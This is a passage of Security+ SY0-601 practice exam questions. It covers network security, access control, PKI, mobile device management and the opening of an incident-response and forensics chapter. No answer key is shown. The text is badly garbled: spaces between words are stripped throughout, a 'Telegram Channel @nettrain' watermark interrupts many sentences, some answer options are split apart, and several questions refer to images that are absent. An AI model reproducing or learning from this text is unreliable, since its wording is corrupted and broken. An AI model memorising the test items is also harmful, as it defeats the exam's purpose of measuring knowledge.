154. Gregknowsthatwhenaswitchdoesn'tknowwhereanodeis,itwillsendoutabroadcasttoattempttofindit.Ifotherswitchesinsideitsbroadcastdomaindonotknowaboutthenode,theywillalsobroadcastthatquery,andthiscancreateamassiveamountoftrafficthatcanquicklyamplifyoutofcontrol.Hewantstopreventthisscenariowithoutcausingthenetworktobeunabletofunction.Whatport-levelsecurityfeaturecanheenabletopreventthis?
A. UseARPblocking.
B. Blockallbroadcastpackets.
C. Enablestormcontrol.
D. Noneoftheabove
155. Isaacisdesigninghisclouddatacenter'spublic-facingnetworkandwantstoproperlyimplementsegmentationtoprotecthisapplicationserverswhileallowinghiswebserverstobeaccessedbycustomers.Whatdesignconceptshouldheapplytoimplementthistypeofsecureenvironment?
A. Areverseproxyserver
B. ADMZ
C. Aforwardproxyserver
D. AVPC
156. Jenniferisconcernedthatsomepeopleinhercompanyhavemore
Telegram Channel @nettrain
privilegesthantheyshould.Thishasoccurredduetopeoplemovingfromonepositiontoanotherandhavingcumulativerightsthatexceedtherequirementsoftheircurrentjobs.Whichofthefollowingwouldbemosteffectiveinmitigatingthisissue?
A. Permissionauditing
B. Jobrotation
C. Preventingjobrotation
D. Separationofduties
157. Susanhasbeentaskedwithhardeningthesystemsinherenvironmentandwantstoensurethatdatacannotberecoveredfromsystemsiftheyarestolenortheirdiskdrivesarestolenandaccessed.Whatisherbestoptiontoensuredatasecurityinthesesituations?
A. Deployfolder-levelencryption.
B. Deployfull-diskencryption.
C. Deployfile-levelencryption.
D. Degaussallthedrives.
158. Chloehasnoticedthatusersonhercompany'snetworkfrequentlyhavesimplepasswordsmadeupofcommonwords.Thus,theyhaveweakpasswords.HowcouldChloebestmitigatethisissue?
A. Increaseminimumpasswordlength.
B. Haveuserschangepasswordsmorefrequently.
C. Requirepasswordcomplexity.
D. ImplementSingleSign-On(SSO).
159. WhichWi-Fiprotocolimplementssimultaneousauthenticationofequals(SAE)toimproveonprevioussecuritymodels?
A. WEP
B. WPA
C. WPA2
D. WPA3
160. Meganwantstosetupanaccountthatcanbeissuedtovisitors.She
Telegram Channel @nettrain
configuresakioskapplicationthatwillallowusersinherorganizationtosponsorthevisitor,settheamountoftimethattheuserwillbeon-site,andthenallowthemtologintotheaccount,setapassword,anduseWi-Fiandotherservices.WhattypeofaccounthasMegancreated?
A. Auseraccount
B. Asharedaccount
C. Aguestaccount
D. Aserviceaccount
161. Henrywantstodeployawebservicetohiscloudenvironmentforhiscustomerstouse.Hewantstobeabletoseewhatishappeningandstopabusewithoutshuttingdowntheserviceifcustomerscauseissues.Whattwothingsshouldheimplementtoallowthis?
A. AnAPIgatewayandlogging
B. APIkeysandloggingviaanAPIgateway
C. AnAPI-centricIPSandanAPIproxy
D. Alloftheabove
162. PatrickhasbeenaskedtoidentifyaUTMapplianceforhisorganization.WhichofthefollowingcapabilitiesisnotacommonfeatureforaUTMdevice?
A. IDSandorIPS
B. Antivirus
C. MDM
D. DLP
163. Acompanywidepolicyisbeingcreatedtodefinevarioussecuritylevels.WhichofthefollowingsystemsofaccesscontrolwouldusedocumentedsecuritylevelslikeConfidentialorSecretforinformation?
A. RBAC
B. MAC
C. DAC
D. BAC
Telegram Channel @nettrain
164. Thisimageshowsatypeofproxy.Whattypeofproxyisshown?
A. Aforwardproxy
B. Aboomerangproxy
C. Anextgenerationproxy
D. Areverseproxy
165. Gurvinderisreviewinglogfilesforauthenticationeventsandnoticesthatoneofhisusershasloggedinfromasystemathiscompany'shomeofficeinChicago.Lessthananhourlater,thesameuserisrecordedaslogginginfromanIPaddressthatgeo-IPtoolssaycomesfromAustralia.Whattypeofissueshouldheflagthisas?
A. AmisconfiguredIPaddress
B. Animpossibletraveltime,riskyloginissue
C. Ageo-IPlookupissue
D. Noneoftheabove
166. Usersinyournetworkareabletoassignpermissionstotheirownsharedresources.Whichofthefollowingaccesscontrolmodelsisusedinyournetwork?
A. DAC
B. RBAC
C. MAC
D. ABAC
167. Cynthiaispreparinganewserverfordeploymentandherprocessincludesturningoffunnecessaryservices,settingsecuritysettingstomatchherorganization'sbaselineconfigurations,andinstallingpatchesandupdates.Whatisthisprocessknownas?
A. OShardening
B. Securityuplift
Telegram Channel @nettrain
C. Configurationmanagement
D. Endpointlockdown
168. Johnisperformingaportscanofanetworkaspartofasecurityaudit.HenoticesthatthedomaincontrollerisusingsecureLDAP.Whichofthefollowingportswouldleadhimtothatconclusion?
A. 53
B. 389
C. 443
D. 636
169. Chriswantstosecurelygenerateandstorecryptographickeysforhisorganization'sservers,whilealsoprovidingtheabilitytooffloadTLSencryptionprocessing.Whattypeofsolutionshouldherecommend?
A. AGPUincryptographicaccelerationmode
B. ATPM
C. AHSM
D. ACPUincryptographicaccelerationmode
170. Tracywantstoprotectdesktopandlaptopsystemsinherorganizationfromnetworkattacks.Shewantstodeployatoolthatcanactivelystopattacksbasedonsignatures,heuristics,andanomalies.Whattypeoftoolshouldshedeploy?
A. Afirewall
B. Antimalware
C. HIDS
D. HIPS
171. Whichofthefollowingaccesscontrolmethodsgrantspermissionsbasedontheuser'spositionintheorganization?
A. MAC
B. RBAC
C. DAC
D. ABAC
Telegram Channel @nettrain
172. WhatdoesUEFImeasuredbootdo?
A. Recordshowlongittakesforasystemtobootup
B. Recordsinformationabouteachcomponentthatisloaded,storesitintheTPM,andcanreportittoaserver
C. ComparesthehashofeverycomponentthatisloadedagainstaknownhashstoredintheTPM
D. ChecksforupdatedversionsoftheUEFI,andcomparesittothecurrentversion;ifitismeasuredasbeingtoofaroutofdate,itupdatestheUEFI
173. Kerberosuseswhichofthefollowingtoissuetickets?
A. Authenticationservice
B. Certificateauthority
C. Ticket-grantingservice
D. Keydistributioncenter
174. Mariawantstoensurethatherwirelesscontrollerandaccesspointsareassecureaspossiblefromattackviahernetwork.Whatcontrolshouldsheputinplacetoprotectthemfrombrute-forcepasswordattacksandsimilarattemptstotakeoverherwirelessnetwork'shardwareinfrastructure?
A. Regularlypatchthedevices.
B. Disableadministrativeaccess.
C. PuttheaccesspointsandcontrollersonaseparatemanagementVLAN.
D. Alloftheabove
175. Marcuswantstocheckonthestatusofcarrierunlockingforallmobilephonesownedbyanddeployedbyhiscompany.Whatmethodisthemosteffectivewaytodothis?
A. Contactthecellularprovider.
B. UseanMDMtool.
C. UseaUEMtool.
D. Noneoftheabove;carrierunlockmustbeverifiedmanuallyonthe
Telegram Channel @nettrain
phone.
176. Michaelwantstoimplementazero-trustnetwork.Whichofthefollowingstepsisnotacommonstepinestablishingazerotrustnetwork?
A. Simplifythenetwork.
B. Usestrongidentityandaccessmanagement.
C. Configurefirewallsforleastprivilegeandapplicationawareness.
D. Logsecurityeventsandanalyzethem.
177. SamanthaislookingforanauthenticationmethodthatincorporatestheX.509standardandwillallowauthenticationtobedigitallysigned.Whichofthefollowingauthenticationmethodswouldbestmeettheserequirements?
A. Certificate-basedauthentication
B. OAuth
C. Kerberos
D. Smartcards
178. YourcompanyreliesheavilyoncloudandSaaSserviceproviderssuchassalesforce.com,Office365,andGoogle.Whichofthefollowingwouldyouhavesecurityconcernsabout?
A. LDAP
B. TACACS+
C. SAML
D. Transitivetrust
179. WhatistheprimarydifferencebetweenMDMandUEM?
A. MDMdoesnotincludepatchmanagement.
B. UEMdoesnotincludesupportformobiledevices.
C. UEMsupportsabroaderrangeofdevices.
D. MDMpatchesdomainmachines,notenterprisemachines.
180. Kathleenwantstoimplementazero-trustnetworkdesignandknowsthatsheshouldsegmentthenetwork.Sheremainsworriedabouteast/westtrafficinsidethenetworksegments.Whatisthefirstsecuritytoolshe
Telegram Channel @nettrain
shouldimplementtoensurehostsremainsecurefromnetworkthreats?
A. Antivirus
B. Host-basedfirewalls
C. Host-basedIPS
D. FDE
181. Garyisdesigninghiscloudinfrastructureandneedstoprovideafirewall-likecapabilityforthevirtualsystemsheisrunning.Whichofthefollowingcloudcapabilitiesactslikeavirtualfirewall?
A. Securitygroups
B. Dynamicresourceallocation
C. VPCendpoints
D. Instanceawareness
182. DerekhasenabledautomaticupdatesfortheWindowssystemsthatareusedinthesmallbusinessheworksfor.Whathardeningprocesswillstillneedtobetackledforthosesystemsifhewantsacompletepatchmanagementsystem?
A. AutomatedinstallationofWindowspatches
B. WindowsUpdateregressiontesting
C. Registryhardening
D. Third-partysoftwareandfirmwarepatching
183. Theresaimplementsanetwork-basedIDS.WhatcanshedototrafficthatpassesthroughtheIDS?
A. Reviewthetrafficbasedonrulesanddetectandalertaboutunwantedorundesirabletraffic.
B. Reviewthetrafficbasedonrulesanddetectandstoptrafficbasedonthoserules.
C. DetectsensitivedatabeingsenttotheoutsideworldandencryptitasitpassesthroughtheIDS.
D. Alloftheabove
184. Muraliisbuildinghisorganization'scontainersecuritybestpractices
Telegram Channel @nettrain
documentandwantstoensurethathecoversthemostcommonitemsforcontainersecurity.Whichofthefollowingisnotaspecificconcernforcontainers?
A. Thesecurityofthecontainerhost
B. Securingthemanagementstackforthecontainer
C. Insiderthreats
D. Monitoringnetworktraffictoandfromthecontainersforthreatsandattacks
185. Gary'sorganizationusesaNATgatewayatitsnetworkedge.WhatsecuritybenefitdoesaNATgatewayprovide?
A. Itstatefullyblockstrafficbasedonportandprotocolasatypeoffirewall.
B. Itcandetectmalicioustrafficandstopitfrompassingthrough.
C. Itallowssystemstoconnecttoanothernetworkwithoutbeingdirectlyexposedtoit.
D. Itallowsnon-IP-basedaddressestobeusedbehindalegitimateIPaddress.
186. Fredsetsuphisauthenticationandauthorizationsystemtoapplythefollowingrulestoauthenticatedusers:
Userswhoarenotlogginginfrominsidethetrustednetworkmustusemultifactorauthentication.
UserswhosedeviceshavenotpassedaNACcheckmustusemultifactorauthentication.
Userswhohaveloggedinfromgeographiclocationsthataremorethan100milesapartwithin15minuteswillbedenied.
WhattypeofaccesscontrolisFredusing?
A. Geofencing
B. Time-basedlogins
C. Conditionalaccess
D. Role-basedaccess
Telegram Channel @nettrain
187. HenryisanemployeeatAcmeCompany.Thecompanyrequireshimtochangehispasswordeverythreemonths.Hehastroublerememberingnewpasswords,sohekeepsswitchingbetweenjusttwopasswords.Whichpolicywouldbemosteffectiveinpreventingthis?
A. Passwordcomplexity
B. Passwordhistory
C. Passwordlength
D. Multifactorauthentication
188. ThefollowingimageshowsascenariowhereSwitchXisattachedtoanetworkbyanenduserandadvertisesitselfwithalowerspanningtreeprioritythantheexistingswitches.Whichofthefollowingsettingscanpreventthistypeofissuefromoccurring?
A. 802.11n
B. Portrecall
C. RIPguard
D. BPDUguard
189. TracywantstolimitwhenuserscanlogintoastandaloneWindowsworkstation.WhatcanTracydotomakesurethatanaccountcalled“visitor”canonlyloginbetween8a.m.and5p.m.everyweekday?
Telegram Channel @nettrain
A. Runningthecommandnetuservisitor/time:M-F,8am-5pm
B. Runningthecommandnetreguservisitor-daily-working-hours
C. Runningthecommandloginlimit:dailytime:
D. 8-5
E. ThiscannotbedonefromtheWindowscommandline.
190. Sheilaisconcernedthatsomeusersonhernetworkmaybeaccessingfilesthattheyshouldnot—specifically,filesthatarenotrequiredfortheirjobtasks.Whichofthefollowingwouldbemosteffectiveindeterminingifthisishappening?
A. Usageauditingandreview
B. Permissionsauditingandreview
C. Accountmaintenance
D. Policyreview
191. Inwhichofthefollowingscenarioswouldusingasharedaccountposetheleastsecurityrisk?
A. Foragroupoftechsupportpersonnel
B. ForguestWi-Fiaccess
C. Forstudentslogginginatauniversity
D. Foraccountswithfewprivileges
192. Mike'smanagerhasaskedhimtoverifythatthecertificatechainfortheirproductionwebsiteisvalid.WhathassheaskedMiketovalidate?
A. Thatthecertificatehasnotbeenrevoked
B. ThatuserswhovisitthewebsitecanverifythatthesiteandtheCAsinthechainarealltrustworthy
C. Thattheencryptionusedtocreatethecertificateisstrongandhasnotbeencracked
D. Thatthecertificatewasissuedproperlyandthatpriorcertificatesissuedforthesamesystemhavealsobeenissuedproperly
193. Mariaisresponsibleforsecurityatasmallcompany.Sheisconcerned
Telegram Channel @nettrain
aboutunauthorizeddevicesbeingconnectedtothenetwork.Sheislookingforadeviceauthenticationprocess.Whichofthefollowingwouldbethebestchoiceforher?
A. CHAP
B. Kerberos
C. 802.11i
D. 802.1X
194. WhichwirelessstandardusesCCMPtoprovideencryptionfornetworktraffic?
A. WPA2
B. WEP
C. Infrared
D. Bluetooth
195. CharlesisaCISOforaninsurancecompany.Herecentlyreadaboutanattackwhereinanattackerwasabletoenumerateallthenetworkdevicesinanorganization.Allthiswasdonebysendingqueriesusingasingleprotocol.WhichprotocolshouldCharlessecuretomitigatethisattack?
A. SNMP
B. POP3
C. DHCP
D. IMAP
196. Magnusisconcernedaboutsomeoneusingapasswordcrackeroncomputersinhiscompany.Heisconcernedthatcrackerswillattemptcommonpasswordsinordertologintoasystem.Whichofthefollowingwouldbebestformitigatingthisthreat?
A. Passwordagerestrictions
B. Passwordminimumlengthrequirements
C. Accountlockoutpolicies
D. Accountusageauditing
197. LucasislookingforanXML-basedopenstandardforexchanging
Telegram Channel @nettrain
authenticationinformation.Whichofthefollowingwouldbestmeethisneeds?
A. SAML
B. OAuth
C. RADIUS
D. NTLM
198. Joshuaislookingforanauthenticationprotocolthatwouldbeeffectiveatstoppingsessionhijacking.Whichofthefollowingwouldbehisbestchoice?
A. CHAP
B. PAP
C. TACACS+
D. RADIUS
199. Greg'scompanyhasaremotelocationthatusesanIP-basedstreamingsecuritycamerasystem.HowcouldGregensurethattheremotelocation'snetworkeddevicescanbemanagedasiftheyarelocaldevicesandthatthetraffictothatremotelocationissecure?
A. Anas-neededTLSVPN
B. Analways-onTLSVPN
C. Analways-onIPSecVPN
D. Anas-neededIPSecVPN
200. WhatdoestheOPALstandardspecify?
A. Onlinepersonalaccesslicenses
B. Self-encryptingdrives
C. Theoriginofpersonalaccountsandlibraries
D. Drivesanitizationmodesfordegaussers
201. WhatdoesUnifiedExtensibleFirmwareInterface(UEFI)SecureBootdo?
A. Itprotectsagainstwormsduringthebootprocess.
B. Itvalidatesasignatureforeachbinaryloadedduringboot.
Telegram Channel @nettrain
C. ItvalidatesthesystemBIOSversion.
D. Alloftheabove
202. Derekistryingtoselectanauthenticationmethodforhiscompany.HeneedsonethatwillworkwithabroadrangeofserviceslikethoseprovidedbyMicrosoftandGooglesothatuserscanbringtheirownidentities.Whichofthefollowingwouldbehisbestchoice?
A. Shibboleth
B. RADIUS
C. OpenIDConnect
D. OAuth
203. Jasonisconsideringdeployinganetworkintrusionpreventionsystem(IPS)andwantstobeabletodetectadvancedpersistentthreats.WhattypeofIPSdetectionmethodismostlikelytodetectthebehaviorsofanAPTafterithasgatheredbaselineinformationaboutnormaloperations?
A. Signature-basedIPSdetections
B. Heuristic-basedIPSdetections
C. MalicioustoolhashIPSdetections
D. Anomaly-basedIPSdetections
204. WhatcomponentismostoftenusedasthefoundationforahardwarerootoftrustforamodernPC?
A. TheCPU
B. ATPM
C. AHSM
D. TheharddriveorSSD
205. DenniswantstodeployafirewallthatcanprovideURLfiltering.Whattypeoffirewallshouldhedeploy?
A. Apacketfilter
B. Astatefulpacketinspectionfirewall
C. Anext-generationfirewall
D. Noneoftheabove
Telegram Channel @nettrain
206. Waleed'sorganizationusesacombinationofinternallydevelopedandcommercialapplicationsthattheydeploytomobiledevicesusedbystaffthroughoutthecompany.Whattypeoftoolcanheusetohandleacombinationofbring-your-own-devicephonesandcorporatetabletsthatneedtohavetheseapplicationsloadedontothemandremovedfromthemwhentheirusersarenolongerpartoftheorganization?
A. MOM
B. MLM
C. MIM
D. MAM
207. Charleneispreparingareportonthemostcommonapplicationsecurityissuesforcloudapplications.Whichofthefollowingisnotamajorconcernforcloudapplications?
A. Localmachineaccessleadingtocompromise
B. Misconfigurationoftheapplication
C. InsecureAPIs
D. Accountcompromise
208. TheCAthatSamanthaisresponsibleforiskeptphysicallyisolatedandisneverconnectedtoanetwork.Whencertificatesareissued,theyaregeneratedthenmanuallytransferredviaremovablemedia.WhattypeofCAisthis,andwhywouldSamantha'sorganizationrunaCAinthismode?
A. AnonlineCA;itisfastertogenerateandprovidecertificates.
B. AnofflineCA;itisfastertogenerateandprovidecertificates.
C. AnonlineCA;itpreventspotentialexposureoftheCA'srootcertificate.
D. AnofflineCA;itpreventspotentialexposureoftheCA'srootcertificate.
209. Susanhasconfiguredavirtualprivatenetwork(VPN)sothattrafficdestinedforsystemsonhercorporatenetworkisroutedovertheVPNbuttrafficsenttootherdestinationsissentoutviatheVPNuser'slocalnetwork.Whatisthisconfigurationcalled?
Telegram Channel @nettrain
A. Half-pipe
B. Full-tunnel
C. Split-tunnel
D. Splithorizon
210. Adamhasexperiencedproblemswithuserspluggingincablesbetweenswitchesonhisnetwork,whichresultsinmultiplepathstothesamedestinationsbeingavailabletosystemsonthenetwork.Whenthisoccurs,thenetworkexperiencesbroadcaststorms,causingnetworkoutages.Whatnetworkconfigurationsettingshouldheenableonhisswitchestopreventthis?
A. Loopprotection
B. Stormwatch
C. Stickyports
D. Portinspection
211. CharlesisconcernedthatusersofAndroiddevicesinhiscompanyaredelayingOTAupdates.WhywouldCharlesbeconcernedaboutthis,andwhatshouldhedoaboutit?
A. OTAupdatespatchapplications,andaNACagentwouldreportonallphonesintheorganization.
B. OTAupdatesupdatedeviceencryptionkeysandarenecessaryforsecurity,andaPKIwouldtrackencryptioncertificatesandkeys.
C. OTAupdatespatchfirmwareandupdatesphoneconfigurations,andanMDMtoolwouldprovidereportsonfirmwareversionsandphonesettings
D. OTAupdatesaresentbyphonestoreportononlineactivityandtracking,andanMDMtoolreceivesOTAupdatestomonitorphones
212. Benispreparingtoimplementafirewallforhisnetworkandisconsideringwhethertoimplementanopensourcefirewalloraproprietarycommercialfirewall.Whichofthefollowingisnotanadvantageofanopensourcefirewall?
A. Lowercost
B. Communitycodevalidation
Telegram Channel @nettrain
C. Maintenanceandsupport
D. Speedofacquisition
213. BarbarawantstoimplementWPA3Personal.WhichofthefollowingfeaturesisamajorsecurityimprovementinWPA3overWPA2?
A. DDoSmonitoringandprevention
B. Per-channelsecurity
C. Brute-forceattackprevention
D. Improvementsfrom64-bitto128-bitencryption
214. IsaacwantstoimplementmandatoryaccesscontrolsonanAndroid-baseddevice.Whatcanhedotoaccomplishthis?
A. RunAndroidinsingle-usermode.
B. UseSEAndroid.
C. ChangetheAndroidregistrytoMACmode.
D. InstallMACDroid.
215. Greghasimplementedasystemthatallowsuserstoaccessaccountslikeadministratorandrootwithoutknowingtheactualpasswordsfortheaccounts.Whenusersattempttouseelevatedaccounts,theirrequestiscomparedtopoliciesthatdetermineiftherequestshouldbeallowed.Thesystemgeneratesanewpasswordeachtimeatrusteduserrequestsaccess,andthenlogstheaccessrequest.WhattypeofsystemhasGregimplemented?
A. AMACsystem
B. APAMsystem
C. AFDEsystem
D. ATLSsystem
216. AlainahasissuedAndroidtabletstostaffinherproductionfacility,butcamerasarebannedduetosensitivedatainthebuilding.Whattypeoftoolcansheusetocontrolcamerauseonallofherorganization'scorporatedevicesthatsheissues?
A. MDM
Telegram Channel @nettrain
B. DLP
C. OPAL
D. MMC
217. Oliviawantstoenforceawidevarietyofsettingsfordevicesusedinherorganization.WhichofthefollowingmethodsshouldsheselectifsheneedstomanagehundredsofdeviceswhilesettingrulesforuseofSMSandMMS,audioandvideorecording,GPStagging,andwirelessconnectionmethodsliketetheringandhotspotmodes?
A. Usebaselinesettingsautomaticallysetforeveryphonebeforeitisdeployedusinganimagingtool.
B. Requireuserstoconfiguretheirphonesusingalockdownguide.
C. UseaUEMtoolandapplicationtomanagethedevices.
D. UseaCASBtooltomanagethedevices.
218. Johnwantstodeployasolutionthatwillprovidecontentfilteringforwebapplications,CASBfunctionality,DLP,andthreatprotection.Whattypeofsolutioncanhedeploytoprovidethesefeatures?
A. Areverseproxy
B. AVPCgateway
C. AnNGSWG
D. Anext-genfirewall
219. BrianwantstolimitaccesstoafederatedservicethatusesSingleSign-Onbasedonuserattributesandgroupmembership,aswellaswhichfederationmembertheuserislogginginfrom.Whichofthefollowingoptionsisbestsuitedtohisneeds?
A. Geolocation
B. Accountauditing
C. Accesspolicies
D. Time-basedlogins
220. SharifusesthechmodcommandinLinuxtosetthepermissionstoafileusingthecommandchmod700example.txt.Whatpermissionhashesetonthefile?
Telegram Channel @nettrain
A. Allusershavewriteaccesstothefile.
B. Theuserhasfullaccesstothefile.
C. Allusershaveexecuteaccesstothefile.
D. Theuserhasexecuteaccesstothefile.
221. Patrickregularlyconnectstountrustednetworkswhenhetravelsandisconcernedthatanon-pathattackcouldbeexecutedagainsthimashebrowseswebsites.Hewouldliketovalidatecertificatesagainstknowncertificatesforthosewebsites.Whattechniquecanheusetodothis?
A. ChecktheCRL.
B. Usecertificatepinning.
C. Comparehisprivatekeytotheirpublickey.
D. Comparetheirprivatekeytotheirpublickey.
222. Whatisthemostcommonformatforcertificatesissuedbycertificateauthorities?
A. DER
B. PFX
C. PEM
D. P7B
223. Michelle'sorganizationusesself-signedcertificatesthroughoutitsinternalinfrastructure.Afteracompromise,Michelleneedstorevokeoneoftheself-signedcertificates.Howcanshedothat?
A. Contactthecertificateauthorityandrequestthattheyrevokethecertificate.
B. AddthecertificatetotheCRL.
C. Removethecertificatefromthelistofwhitelistedcertificatesfromeachmachinethattrustsit.
D. Reissuethecertificate,causingtheoldversiontobeinvalidated.
224. Whichofthefollowingisnotacommonwaytovalidatecontroloveradomainforadomain-validatedX.509certificate?
A. ChangingtheDNSTXTrecord
Telegram Channel @nettrain
B. Respondingtoanemailsenttoacontactinthedomain'sWHOISinformation
C. Publishinganonceprovidedbythecertificateauthorityaspartofthedomaininformation
D. ChangingtheIPaddressesassociatedwiththedomain
225. FionaknowsthatSNMPv3providesadditionalsecurityfeaturesthatpreviousversionsofSNMPdidnot.WhichofthefollowingisnotasecurityfeatureprovidedbySNMPv3?
A. SQLinjectionprevention
B. Messageintegrity
C. Messageauthentication
D. Messageconfidentiality
226. Thefollowingfigureshowsaproxyinuse.Inthisusagemodel,theproxyreceivesaconnectionrequest,andthenconnectstotheserverandforwardstheoriginalrequest.Whattypeofproxyisthis?
A. Areverseproxy
B. Around-robinproxy
C. Anext-generationproxy
D. Aforwardproxy
Telegram Channel @nettrain
Chapter4OperationsandIncidentResponse
THECOMPTIASECURITY+EXAMSY0-601TOPICSCOVEREDINTHISCHAPTERINCLUDETHEFOLLOWING:
4.1 Givenascenario,usetheappropriatetooltoassessorganizationalsecurity
4.2 Summarizetheimportanceofpolicies,processes,andproceduresforincidentresponse
4.3 Givenanincident,utilizeappropriatedatasourcestosupportaninvestigation
4.4 Givenanincident,applymitigationtechniquesorcontrolstosecureanenvironment
4.5 Explainthekeyaspectsofdigitalforensics
1. Milawantstogenerateauniquedigitalfingerprintforafile,andneedstochoosebetweenachecksumandahash.Whichoptionshouldshechooseandwhyshouldshechooseit?
A. Ahash,becauseitisuniquetothefile
B. Achecksum,becauseitverifiesthecontentsofthefile
C. Ahash,becauseitcanbereversedtovalidatethefile
D. Achecksum,becauseitislesspronetocollisionsthanahash
2. Whichofthefollowingwouldpreventauserfrominstallingaprogramonacompany-ownedmobiledevice?
A. Anallowlist
B. Adenylist
C. ACL
D. HIDS
Telegram Channel @nettrain
3. Liamisresponsibleformonitoringsecurityeventsinhiscompany.Hewantstoseehowdiverseeventsmayconnectusinghissecurityinformationandeventmanagement(SIEM).Heisinterestedinidentifyingdifferentindicatorsofcompromisethatmaypointtothesamebreach.Whichofthefollowingwouldbemosthelpfulforhimtoimplement?
A. NIDS
B. PKI
C. Acorrelationdashboard
D. Atrenddashboard
4. EmilywantstocaptureHTTPSpacketsusingtcpdump.IftheserviceisrunningonitsdefaultportandherEthernetadapteriseth0,whichtcpdumpcommandshouldsheuse?
A. tcpdumpeth0-protohttps
B. tcpdump-ieth0-protohttps
C. tcpdumptcphttpseth0
D. tcpdump-ieth0tcpport443
5. Milagivesherteamascenario,andthenasksthemquestionsabouthowtheywouldrespond,whatissuestheyexpecttheymightencounter,andhowtheywouldhandlethoseissues.Whattypeofexercisehassheconducted?
A. Atabletopexercise
B. Awalk-through
C. Asimulation
D. Adrill
6. Muraliispreparingtoacquiredatafromvariousdevicesandsystemsthataretargetsinaforensicinvestigation.Whichofthefollowingdevicesistheleastvolatileaccordingtotheorderofvolatility?
A. Backups
B. CPUcache
C. Localdisk
D. RAM
Telegram Channel @nettrain
7. Henryhasbeenaskedforvulnerabilityscanresultsbyanincidentresponder.Heiscurioustoknowwhytheresponderneedsscanresults.Whatanswerwouldyouprovidetohimtoexplainwhyscanresultsareneededandareuseful?
A. Thescanswillshowtheprogramstheattackersused.
B. Thescanswillshowtheversionsofsoftwareinstalledbeforetheattack.
C. Vulnerableserviceswillprovidecluesaboutwhattheattackersmayhavetargeted.
D. Thescanswillshowwherefirewallsandothernetworkdeviceswereinplacetohelpwithincidentanalysis.
8. WhatphaseoftheincidentresponseprocessshouldbeplacedatpointAinthefollowingimage?
A. Simulations
B. Review
Telegram Channel @nettrain
C. Recovery
D. Patching
9. NickisreviewingcommandsrunonaWindows10systemanddiscoversthattheroutecommandwasrunwiththe-pflag.Whatoccurred?
A. Routeswerediscoveredusingapingcommand.
B. Theroute'spathwillbedisplayed.
C. Aroutewasaddedthatwillpersistbetweenboots.
D. Aroutewasaddedthatwillusethepathlistedinthecommand.
10. LuccawantstoacquireopensourceintelligenceinformationusinganautomatedtoolthatcanleveragesearchenginesandtoolslikeShodan.Whichofthefollowingtoolsshouldheselect?
A. curl
B. hping
C. netcat
D. theHarvester
11. Brentwantstouseatooltohelphimanalyzemalwareandattacksandwantstocoverabroadrangeoftacticsandtoolsthatareusedbyadversaries.Whichofthefollowingisbroadlyimplementedintechnicaltoolsandcoverstechniquesandtacticswithoutrequiringaspecificorderofoperations?
A. TheDiamondModelofIntrusionAnalysis
B. TheCyberKillChain
C. TheMITREATT&CKframework
D. TheCVSSstandard
12. Tedneedstopreserveaserverforforensicpurposes.Whichofthefollowingshouldhenotdo?
A. Turnthesystemofftoensurethatdatadoesnotchange.
B. Removethedrivewhilethesystemisrunningtoensurethatdatadoesnotchange.
C. Leavethemachineconnectedtothenetworksothatuserscancontinue
Telegram Channel @nettrain
touseit.
D. Alloftheabove
13. Whatmitigationtechniqueisusedtolimittheabilityofanattacktocontinuewhilekeepingsystemsandservicesonline?
A. Segmentation
B. Isolation
C. Nuking
D. Containment
14. JessicawantstoreviewthenetworktrafficthatherWindowssystemhassenttodetermineifafilecontainingsensitivedatawasuploadedfromthesystem.WhatWindowslogfilecansheusetofindthisinformation?
A. Theapplicationlog
B. Thenetworklog
C. Thesecuritylog
D. Noneoftheabove
15. Whattermisusedtodescribethedocumentationtrailforcontrol,analysis,transfer,andfinaldispositionofevidencefordigitalforensicwork?
A. Evidencelog
B. Papertrail
C. Chainofcustody
D. Digitalfootprint
16. Henrywantstodeterminewhatservicesareonanetworkthatheisassessing.Whichofthefollowingtoolswillprovidehimwithalistofservices,ports,andtheirstatus?
A. nmap
B. route
C. hping
D. netstat
17. Nathanneedstoknowhowmanytimesaneventoccurredandwantsto
Telegram Channel @nettrain
checkalogfileforthatevent.Whichofthefollowinggrepcommandswilltellhimhowmanytimestheeventhappenedifeachoccurrenceisloggedindependentlyinthelogfile.txtlogfile,andusesauniqueeventID:event101?
A. greplogfile.txt-n'event101'
B. grep-c'event101'logfile.txt
C. greplogfile.txt-c'event101'
D. grep-cevent101-ilogfile.txt
18. Jacobwantstoensurethatalloftheareasthatareimpactedbyanincidentareaddressedbyhisincidentresponseteam.Whattermisusedtodescribetherelationshipandcommunicationsprocessthatteamsusetoensurethatallofthoseinvolvedaretreatedappropriately?
A. COOP
B. Stakeholdermanagement
C. PAM
D. Communicationsplanning
19. WhileSusanisconductingaforensicreviewoflogsfromtwoservershostedinthesamedatacenter,shenoticesthatlogitemsonthefirstserveroccurredexactlyanhourbeforematchingeventsonthesecondserver.Whatisthemostlikelycauseofsuchexactoccurrences?
A. Theattacktookanhourtocomplete,providingtheattackerwithaccesstothesecondmachineanhourlater.
B. Thelogentriesareincorrect,causingtheeventstoappearatthewrongtime.
C. Theattackerusedascriptcausingeventstohappenexactlyanhourapart.
D. Atimeoffsetiscausingtheeventstoappeartooccuratdifferenttimes.
20. WhatistheprimaryusageofDomainNameSystem(DNS)datainincidentinvestigationsandoperationalsecuritymonitoring?
A. DNSdataisusedtocapturenetworkscans.
B. DNSdatacanbeusedtoidentifydomaintransferattacks.
Telegram Channel @nettrain
C. DNSloginformationcanbeusedtoidentifymalwaregoingtoknownmalicioussites.
D. DNSloginformationcanbeusedtoidentifyunauthorizedlogins.
21. DanigeneratesanOpenSSLcertificateusingthefollowingcommand.Whathasshesetwiththeflag-rsa:2048?
opensslreq-x509-sha256-nodes-days365-newkeyrsa:2048
-keyoutprivateKey.key-outmycert.crt
A. Theyearthatthecertificatewillexpire
B. Thekeylengthinbytes
C. Theyearthattherootcertificatewillexpire
D. Thekeylengthinbits
22. Theresawantstoviewthelast10linesofalogfileandtoseeitchangeasmodificationsaremade.WhatcommandshouldsherunontheLinuxsystemsheisloggedinto?
A. head-f-end10logfile.log
B. tail-flogfile.log
C. foot-watch-l10logfile.log
D. follow-tail10logfile.log
23. Henrywantstoacquirethefirmwarefromarunningsystem.Whatisthemostlikelytechniquethathewillneedtousetoacquirethefirmware?
A. Connectusingaserialcable.
B. Acquirethefirmwarefrommemoryusingmemoryforensicstools.
C. Acquirethefirmwarefromdiskusingdiskforensictools.
D. Noneoftheabove
24. Ericwantstodeterminehowmuchbandwidthwasusedduringacompromiseandwherethetrafficwasdirectedto.Whattechnologycanheimplementbeforetheeventtohelphimseethisdetailandallowhimtohaveaneffectivebandwidthmonitoringsolution?
A. Afirewall
B. NetFlow
Telegram Channel @nettrain
C. packetflow
D. ADLP
